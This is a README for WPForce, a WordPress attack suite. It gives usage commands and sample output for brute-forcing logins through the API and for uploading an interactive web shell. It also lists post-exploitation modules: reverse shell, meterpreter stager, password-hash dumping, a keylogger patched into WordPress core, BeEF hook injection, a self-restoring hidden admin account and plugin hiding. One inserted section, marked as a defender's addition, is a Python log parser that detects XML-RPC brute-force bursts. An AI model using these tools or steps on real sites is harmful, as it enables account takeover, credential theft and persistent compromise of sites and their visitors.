n00py / Wpforce

Licence: bsd-2-clause
Wordpress Attack Suite

Programming languages: javascript, python

WPForce - Wordpress Attack Suite

ABOUT:

WPForce is a suite of WordPress attack tools. It currently contains two scripts: WPForce, which brute-forces logins via the API, and Yertle, which uploads shells once admin credentials have been found. Yertle also contains a number of post-exploitation modules.

For more information, visit the blog post here: https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/

Blogs in other languages:

Chinese - www.mottoin.com/100381.html

Portuguese - http://www.100security.com.br/wpforce/

Spanish - http://www.1024megas.com/2017/05/wpforce-fuerzabruta-postexplotacion.html

https://esgeeks.com/como-hackear-sitio-wordpress-con-wpforce/

Russian - https://hackware.ru/?p=2547

French - https://securityhack3r.info/wpforce-brute-force-attack-tool-wordpress/

Turkish - http://turkhackteam.org/web-server-guvenligi/1655005-wordpress-site-sizma-testi-part-1-a.html

FEATURES:

  • Brute force via the API rather than the login form, bypassing some forms of protection
  • Can automatically upload an interactive shell
  • Can be used to spawn a full featured reverse shell
  • Dumps WordPress password hashes
  • Can backdoor authentication function for plaintext password collection
  • Inject BeEF hook into all pages
  • Pivot to meterpreter if needed

INSTALL:

Yertle requires the requests library to run.
http://docs.python-requests.org/en/master/user/install/

USAGE:

python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"

   ,-~~-.___.       __        __ ____   _____
  / |  x     \      \ \      / /|  _ \ |  ___|___   _ __  ___  ___
 (  )        0       \ \ /\ / / | |_) || |_  / _ \ | '__|/ __|/ _ \.
  \_/-, ,----'  ____  \ V  V /  |  __/ |  _|| (_) || |  | (__|  __/
     ====      ||   \_ \_/\_/   |_|    |_|   \___/ |_|   \___|\___|
    /  \-'~;   ||     |
   /  __/~| ...||__/|-"   Brute Force Attack Tool for Wordpress
 =(  _____||________|                 ~n00py~

Username List: usr.txt (3)
Password List: pass.txt (21)
URL: http://www[website].com
--------------------------
[[email protected] : xxxxxxxxxxxxx] are valid credentials!  - THIS ACCOUNT IS ADMIN
--------------------------
--------------------------
[[email protected] : xxxxxxxxxxxx] are valid credentials!
--------------------------
 100% Percent Complete
All correct pairs:
{'[email protected]': 'xxxxxxxxxxxxx', '[email protected]': 'xxxxxxxxxxxxx'}

  -h, --help            show this help message and exit
  -i INPUT, --input INPUT
                        Input file name
  -w WORDLIST, --wordlist WORDLIST
                        Wordlist file name
  -u URL, --url URL     URL of target
  -v, --verbose         Verbose output. Show the attemps as they happen.
  -t THREADS, --threads THREADS
                        Determines the number of threads to be used, default
                        is 10
  -a AGENT, --agent AGENT
                        Determines the user-agent
  -d, --debug           This option is used for determining issues with the
                        script.
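
Because the brute force goes through the API rather than the login form, and the user-agent (-a) and thread count (-t, default 10) are chosen by the operator, detection has to key on request rate per source address at the API endpoint. The following is an added example for defenders, not part of WPForce; it assumes the API in question is XML-RPC at /xmlrpc.php, a combined-format access log, and an illustrative threshold of 20 POSTs per 60 seconds.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = "\n".join(
    [f'203.0.113.7 - - [12/Mar/2017:10:00:{s:02d} +0000] '
     '"POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"' for s in range(30)]
    + ['198.51.100.4 - - [12/Mar/2017:10:00:05 +0000] '
       '"POST /xmlrpc.php HTTP/1.1" 200 403 "-" "WordPress/4.7"',
       '198.51.100.9 - - [12/Mar/2017:10:00:09 +0000] '
       '"GET /xmlrpc.php HTTP/1.1" 405 42 "-" "curl/7.50"',
       '198.51.100.4 - - [12/Mar/2017:10:00:11 +0000] '
       '"POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"'])

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)')

def parse(line):
    """Return (ip, timestamp, method, path) or None for unparseable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, method, path.split("?", 1)[0]

def find_api_bruteforce(log_text, endpoint="/xmlrpc.php", max_posts=20, window_s=60):
    """Return {ip: peak POST count} for clients exceeding max_posts per window.

    Requests are counted rather than failures: XML-RPC reports a bad login
    as a fault inside an HTTP 200 response, so status codes do not help.
    The endpoint and thresholds are assumptions to tune per site.
    """
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)   # ip -> timestamps inside the sliding window
    peaks = defaultdict(int)      # ip -> largest window population seen
    events = sorted(filter(None, map(parse, log_text.splitlines())),
                    key=lambda e: e[1])
    for ip, when, method, path in events:
        if method != "POST" or path != endpoint:
            continue
        q = recent[ip]
        q.append(when)
        while when - q[0] > window:
            q.popleft()
        peaks[ip] = max(peaks[ip], len(q))
    return {ip: n for ip, n in peaks.items() if n > max_posts}
```

Rate limiting or blocking the endpoint at the web server covers the same path that login-form protections miss.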


python yertle.py -u "[username]" -p "[password]" -t "http://www.[website].com" -i
     _..---.--.    __   __        _   _
   .'\ __|/O.__)   \ \ / /__ _ __| |_| | ___
  /__.' _/ .-'_\    \ V / _ \ '__| __| |/ _ \.
 (____.'.-_\____)    | |  __/ |  | |_| |  __/
  (_/ _)__(_ \_)\_   |_|\___|_|   \__|_|\___|
   (_..)--(.._)'--'         ~n00py~
      Post-exploitation Module for Wordpress

Backdoor uploaded!
Upload Directory: ebwhbas
os-shell>



  -h, --help            show this help message and exit
  -i, --interactive     Interactive command shell
  -r, --reverse         Reverse Shell
  -t TARGET, --target TARGET
                        URL of target
  -u USERNAME, --username USERNAME
                        Admin username
  -p PASSWORD, --password PASSWORD
                        Admin password
  -li IP, --ip IP       Listener IP
  -lp PORT, --port PORT
                        Listener Port
  -v, --verbose         Verbose output.
  -e EXISTING, --existing EXISTING
                        Skips uploading a shell, and connects to existing
                        shell


Yertle currently contains these modules:

Core Commands
=============
 
Command                   Description
-------                   -----------
?                         Help menu
beef                      Injects a BeEF hook into website
dbcreds                   Prints the database credentials
exit                      Terminate the session
hashdump                  Dumps all WordPress password hashes
help                      Help menu
keylogger                 Patches WordPress core to log plaintext credentials
keylog                    Displays keylog file
meterpreter               Executes a PHP meterpreter stager to connect to metasploit
persist                   Creates an admin account that will re-add itself
quit                      Terminate the session
shell                     Sends a TCP reverse shell to a netcat listener
stealth                   Hides Yertle from the plugins page